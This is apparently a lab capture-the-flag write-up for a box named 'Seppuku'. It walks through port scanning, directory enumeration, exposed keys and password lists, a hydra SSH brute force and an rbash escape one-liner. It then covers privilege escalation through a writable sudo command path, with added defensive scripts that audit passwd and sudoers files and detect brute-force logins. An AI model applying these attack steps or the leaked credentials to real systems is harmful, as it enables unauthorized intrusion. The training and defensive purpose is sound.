Seppuku


Summary

The basic enumeration consisted of a port scan and sub-directory enumeration; sensitive information exposed on the open ports and in the sub-directories led to the initial foothold on the system. A misconfigured sudoers file and weak file permissions were also present, which led to privilege escalation.

Thus, sensitive information that can lead to a system breach should be kept confidential, and the sudoers file and file permissions should be inspected regularly to minimize and mitigate the risk of a low-privileged user escalating privileges.

Reconnaissance

Nmap

The initial full port scan:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 03:05 EDT
Nmap scan report for seppuku (192.168.220.90)
Host is up (0.28s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
7080/tcp open  empowerid
7601/tcp open  unknown
8088/tcp open  radan-http

Nmap done: 1 IP address (1 host up) scanned in 937.58 seconds

The aggressive scan (-sC -sV) of the interesting ports:

# Nmap 7.92 scan initiated Thu Jun 16 02:13:07 2022 as: nmap -sC -sV -p139,445,7080,7601,8088 -oN initial/nmap2 seppuku
Nmap scan report for seppuku (192.168.243.90)
Host is up (0.28s latency).

PORT     STATE SERVICE       VERSION
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/empowerid LiteSpeed
|_http-title: Did not follow redirect to https://seppuku:7080/
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_http-server-header: LiteSpeed
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
7601/tcp open  http          Apache httpd 2.4.38 ((Debian))
|_http-title: Seppuku
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open  http          LiteSpeed httpd
|_http-title: Seppuku
|_http-server-header: LiteSpeed

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-06-16T06:13:50
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2022-06-16T02:13:51-04:00
|_clock-skew: mean: 1h20m00s, deviation: 2h18m35s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 16 02:14:07 2022 -- 1 IP address (1 host up) scanned in 59.28 seconds

Port 7601 was serving Apache, so a gobuster scan was run against it and obtained the following results.

Gobuster

Gobuster results:

/.hta                 (Status: 403) [Size: 274]
/.hta.html            (Status: 403) [Size: 274]
/.hta.php             (Status: 403) [Size: 274]
/.htaccess.html       (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/.htaccess.php        (Status: 403) [Size: 274]
/.htpasswd.php        (Status: 403) [Size: 274]
/.htpasswd.html       (Status: 403) [Size: 274]
/a                    (Status: 301) [Size: 305] [--> http://seppuku:7601/a/]
/b                    (Status: 301) [Size: 305] [--> http://seppuku:7601/b/]
/c                    (Status: 301) [Size: 305] [--> http://seppuku:7601/c/]
/ckeditor             (Status: 301) [Size: 312] [--> http://seppuku:7601/ckeditor/]
/d                    (Status: 301) [Size: 305] [--> http://seppuku:7601/d/]
/database             (Status: 301) [Size: 312] [--> http://seppuku:7601/database/]
/e                    (Status: 301) [Size: 305] [--> http://seppuku:7601/e/]
/f                    (Status: 301) [Size: 305] [--> http://seppuku:7601/f/]
/h                    (Status: 301) [Size: 305] [--> http://seppuku:7601/h/]
/index.html           (Status: 200) [Size: 171]
/index.html           (Status: 200) [Size: 171]
/keys                 (Status: 301) [Size: 308] [--> http://seppuku:7601/keys/]
/production           (Status: 301) [Size: 314] [--> http://seppuku:7601/production/]
/q                    (Status: 301) [Size: 305] [--> http://seppuku:7601/q/]
/r                    (Status: 301) [Size: 305] [--> http://seppuku:7601/r/]
/secret               (Status: 301) [Size: 310] [--> http://seppuku:7601/secret/]
/server-status        (Status: 403) [Size: 274]
/t                    (Status: 301) [Size: 305] [--> http://seppuku:7601/t/]
/w                    (Status: 301) [Size: 305] [--> http://seppuku:7601/w/]

Vulnerability Analysis

The sub-directory enumeration above turned up two valuable sub-directories: secret and keys.

curl http://seppuku:7601/keys/ showed two key files:

private:

-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

and its backup, private.bak, which was identical to the private key.

The directory listing of /secret/ was:

[PARENTDIR]	Parent Directory	 	- 	 
[ ]	hostname	2020-05-13 03:41 	8 	 
[IMG]	jack.jpg	2018-09-12 03:49 	58K	 
[ ]	passwd.bak	2020-05-13 03:47 	2.7K	 
[ ]	password.lst	2020-05-13 03:59 	672 	 
[ ]	shadow.bak	2020-05-13 03:48 	1.4K	 

The hostname from /secret/hostname is seppuku.

A user list came from /secret/passwd.bak:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false
cups-pk-helper:x:111:118:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:113:119::/nonexistent:/bin/false
kernoops:x:114:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:115:121::/var/lib/saned:/usr/sbin/nologin
pulse:x:116:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:117:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:118:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/var/run/hplip:/bin/false
debian-tor:x:120:126::/var/lib/tor:/bin/false
iodine:x:121:65534::/var/run/iodine:/usr/sbin/nologin
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null
postfix:x:123:128::/var/spool/postfix:/usr/sbin/nologin
nm-openvpn:x:124:130:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
statd:x:125:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
nm-openconnect:x:127:131:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash

Filtering for users that can execute /bin/bash with cat passwd.bak | grep '/bin/bash' gave:

root:x:0:0:root:/root:/bin/bash
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash

which is a rabbit hole!
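The grep above only matches /bin/bash and would miss an account given another interactive shell such as /bin/sh. The following script is added here as an example and is not part of the original writeup: it parses passwd-format lines and reports every account whose shell is not a known non-login shell, plus every UID 0 account. The sample input is a subset of the passwd.bak listing above with one constructed /bin/sh account (ops) appended.

```python
"""Audit a passwd-format file for accounts that can get an interactive shell.

Generalises the grep-for-/bin/bash filter: any shell that is not a known
non-login shell is treated as interactive.
"""
from dataclasses import dataclass

# Shells that deny an interactive login; anything else is treated as interactive.
NON_LOGIN_SHELLS = {
    "/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", "/dev/null", "",
}


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    @property
    def interactive(self) -> bool:
        return self.shell not in NON_LOGIN_SHELLS

    @property
    def privileged(self) -> bool:
        # UID 0 is root regardless of the account name
        return self.uid == 0


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into PasswdEntry objects; blank and # lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def interactive_accounts(text: str) -> list:
    """Names of accounts whose shell allows an interactive login."""
    return [e.name for e in parse_passwd(text) if e.interactive]


def uid0_accounts(text: str) -> list:
    """Names of all UID 0 accounts; more than one is a finding on its own."""
    return [e.name for e in parse_passwd(text) if e.privileged]


# Subset of the passwd.bak listing from the writeup, plus one constructed
# /bin/sh account ("ops") that a grep for /bin/bash alone would miss.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false
thpot:x:122:65534:Honeypot user,,,:/usr/share/thpot:/dev/null
rabbit-hole:x:1001:1001:,,,:/home/rabbit-hole:/bin/bash
ops:x:1002:1002:constructed example:/home/ops:/bin/sh
"""

if __name__ == "__main__":
    for name in interactive_accounts(SAMPLE_PASSWD):
        print("interactive login:", name)
    print("uid 0 accounts:", uid0_accounts(SAMPLE_PASSWD))
```

Run against a real /etc/passwd with `interactive_accounts(open("/etc/passwd").read())`; the list should contain only the accounts you expect people to log in with.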

But /secret/password.lst provided a password list:

123456
12345
password
password1
123456789
12345678
1234567890
abc123
computer
tigger
1234
qwerty
money
carmen
mickey
secret
summer
internet
a1b2c3
123
service
canada
hello
ranger
shadow
baseball
donald
harley
hockey
letmein
maggie
mike
mustang
snoopy
buster
dragon
jordan
michael
michelle
mindy
patrick
123abc
andrew
bear
calvin
changeme
diamond
withme
withyou
matthew
miller
tiger
trustno1
alex
apple
avalon
brandy
chelsea
coffee
falcon
freedom
gandalf
green
helpme
linda
magic
merlin
newyork
soccer
thomas
wizard
asdfgh
bandit
batman
boris
butthead
dorothy
eeyoree
fishing
Football
george
happy
iloveyou
jennifer
jonathan
love
marina
master
missy
monday
monkey
natasha

The information gathered above can be used to perform a brute-force attack against the server.

Password Attacks

With the password list retrieved above and the hostname as the username, tried to get into the server over SSH by brute-forcing with hydra: hydra -l seppuku -P password.lst ssh://seppuku -f

The brute-force run gave the password for the username seppuku: eeyoree.
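A hydra run like the one above leaves a burst of "Failed password" events for one username from one source in sshd's log, followed by a single "Accepted password". The following detector is an added example and not part of the original writeup: it groups failures by source IP over a sliding time window and reports any source that crosses a threshold, together with the account it eventually logged in as. The log lines are constructed for the example (192.0.2.x is a documentation range).

```python
"""Flag SSH password-guessing bursts in auth.log-style sshd lines."""
import re
from collections import defaultdict
from datetime import datetime

# sshd's classic syslog format, e.g.
# "Jun 14 03:20:01 seppuku sshd[1201]: Failed password for seppuku from 192.0.2.10 port 51000 ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line, year=2022):
    """Return (timestamp, result, user, src) or None for lines that are not password events.
    Syslog lines carry no year, so it is passed in."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {src: {"failures": n, "users": set, "succeeded_as": user-or-None}}
    for every source with at least `threshold` failures inside `window_seconds`."""
    failures = defaultdict(list)   # src -> [timestamps of failed attempts]
    users = defaultdict(set)       # src -> usernames tried
    success = {}                   # src -> user of the first success after failures
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        if result == "Failed":
            failures[src].append(ts)
            users[src].add(user)
        elif src in failures and src not in success:
            # a success after prior failures is the interesting case
            success[src] = user
    findings = {}
    for src, stamps in failures.items():
        stamps.sort()
        # largest number of failures that fit inside one window
        best, start = 0, 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            findings[src] = {"failures": len(stamps), "users": users[src],
                             "succeeded_as": success.get(src)}
    return findings


# Constructed sample: a guessing burst from one source ending in a success,
# plus a single unrelated failure from another source.
SAMPLE_LOG = [
    "Jun 14 03:20:01 seppuku sshd[1201]: Failed password for seppuku from 192.0.2.10 port 51000 ssh2",
    "Jun 14 03:20:02 seppuku sshd[1203]: Failed password for seppuku from 192.0.2.10 port 51002 ssh2",
    "Jun 14 03:20:02 seppuku sshd[1205]: Failed password for seppuku from 192.0.2.10 port 51004 ssh2",
    "Jun 14 03:20:03 seppuku sshd[1207]: Failed password for seppuku from 192.0.2.10 port 51006 ssh2",
    "Jun 14 03:20:04 seppuku sshd[1209]: Failed password for seppuku from 192.0.2.10 port 51008 ssh2",
    "Jun 14 03:20:05 seppuku sshd[1211]: Failed password for seppuku from 192.0.2.10 port 51010 ssh2",
    "Jun 14 03:20:06 seppuku sshd[1213]: Accepted password for seppuku from 192.0.2.10 port 51012 ssh2",
    "Jun 14 03:25:00 seppuku sshd[1301]: Failed password for samurai from 192.0.2.77 port 40000 ssh2",
]

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

The threshold and window are deliberately low for the sample; on a real host tune them to the normal rate of typos, and treat a burst that ends in "Accepted" as a confirmed compromise rather than a mere attempt.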

Exploitation

Foothold

SSH into the machine with the credentials above.

Found that the shell was rbash, so used python -c "import os; os.system('/bin/bash');" to spawn a bash shell, since rbash restricted the available commands.

Found that the user could execute /usr/bin/ln -sf /root/ /tmp/ as superuser, which only meant that we could create a link to the /root/ folder inside /tmp/; reading /tmp/root isn't possible, since it is just a link to /root/ and we do not have read permission on /root/.

Privilege Escalation

Looking at all the files in the home directory, found a .passwd file which held the key 12345685213456!@!@A. From /etc/passwd learned that there were two more users, samurai and tanto. The SSH private key found at http://seppuku:7601/keys/private might belong to one of these users, so tried:

tanto

chmod 400 ssh.privkey && ssh -i ssh.privkey samurai@seppuku failed, so tried the user tanto with ssh -i ssh.privkey tanto@seppuku and got into the server as tanto.

samurai

The password from ~/.passwd of seppuku could be the password of samurai, so tried su samurai, entered the retrieved password, and got into the server as samurai.

root

To list the commands that could be run as superuser, used sudo -l and found (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*. This means that the script at ../../../../../../../home/tanto/.cgi_bin/bin is run as root, but the folder is writable by the user tanto.

SSH in as the user tanto.

Found that ../../../home/tanto/.cgi_bin did not exist, so created the directory and the file ../../../../../../../home/tanto/.cgi_bin/bin.

Finally, wrote a simple script that spawns a bash shell into the ~/.cgi_bin/bin file and changed its mode to 777, i.e. readable, writable and executable by all users.

From the user samurai, ran sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*, which executed the script at /../../../../../../home/tanto/.cgi_bin/bin and spawned a bash shell with superuser privileges.
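The root step works because of two sudoers defects that an audit can catch before anyone exploits them: the command path is written with a leading /../../.. that sudo resolves to /home/tanto/.cgi_bin/bin, a location under a non-root user's home that did not even exist yet, and the rule passes a wildcard argument. The following checker is an added example, not the author's tooling: it parses simplified sudoers user specifications, normalises the command path, walks each path component and flags any that is missing, not owned by root, or group/world-writable, and flags wildcard arguments. Ownership is looked up through an injectable function so the check can run against a constructed filesystem map; the user-spec form of the two rules from this box (samurai and seppuku) and tanto's uid 1001 are assumptions, and the ops rule is constructed as a clean control.

```python
"""Audit sudoers NOPASSWD rules for traversal, wildcard and writable-path weaknesses."""
import os
import posixpath
import re
import stat

# user  host = (runas) [TAG:...] command [args]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)


def parse_rule(line):
    """Parse one user specification; returns None for comments, Defaults, blanks."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    parts = m["cmd"].strip().split()
    return {
        "user": m["user"],
        "runas": m["runas"].strip(),
        "nopasswd": "NOPASSWD" in m["tags"],
        "raw_path": parts[0],
        # normpath collapses the leading /../../.. into the real target path
        "path": posixpath.normpath(parts[0]),
        "args": parts[1:],
    }


def components(path):
    """All ancestor paths of `path`, from the top down, e.g. /home, /home/tanto, ..."""
    cur, out = "/", []
    for comp in [c for c in path.split("/") if c]:
        cur = posixpath.join(cur, comp)
        out.append(cur)
    return out


def stat_owner(path):
    """Real filesystem lookup: (owner uid, group/world writable) or None if missing."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    return st.st_uid, bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudoers(lines, owner=stat_owner):
    """Return {rule_line: [problem, ...]} for every root-capable rule with a weakness."""
    findings = {}
    for line in lines:
        rule = parse_rule(line)
        if rule is None or rule["runas"] not in ("ALL", "root"):
            continue
        problems = []
        if ".." in rule["raw_path"].split("/"):
            problems.append("command path uses '..' traversal")
        for comp in components(rule["path"]):
            info = owner(comp)
            if info is None:
                problems.append(f"{comp} does not exist (creatable by the owner of its parent)")
                break
            uid, writable = info
            if uid != 0:
                problems.append(f"{comp} owned by uid {uid}, not root")
            if writable:
                problems.append(f"{comp} is group- or world-writable")
        if any(ch in a for a in rule["args"] for ch in "*?"):
            problems.append("wildcard argument lets the caller choose the inputs")
        if problems:
            findings[line.strip()] = problems
    return findings


# Constructed filesystem map: path -> (owner uid, group/world writable).
# uid 1001 for tanto is an assumption; paths absent from the map do not exist.
CONSTRUCTED_FS = {
    "/home": (0, False), "/home/tanto": (1001, False),
    "/usr": (0, False), "/usr/bin": (0, False),
    "/usr/bin/ln": (0, False), "/usr/bin/systemctl": (0, False),
}


def constructed_owner(path):
    return CONSTRUCTED_FS.get(path)


# The two rules from this box in user-spec form (assumed), plus a clean control rule.
SAMPLE_SUDOERS = [
    "samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*",
    "seppuku ALL=(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/",
    "ops ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx",
]

if __name__ == "__main__":
    for rule_line, problems in audit_sudoers(SAMPLE_SUDOERS, owner=constructed_owner).items():
        print(rule_line)
        for p in problems:
            print("   -", p)
```

Against a live host, call `audit_sudoers(open("/etc/sudoers").read().splitlines())` as root (the default `stat_owner` then consults the real filesystem); any rule whose command resolves under a user-owned or missing directory should be rewritten to point at a root-owned, non-writable binary with fixed arguments.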

Post-Exploitation

After exploitation, the /etc/shadow file was extracted with the aim of cracking the root password using hashcat. The password was stored as a SHA512 hash. Used rockyou.txt and the password.lst retrieved above with hashcat to try to brute-force the password, but failed.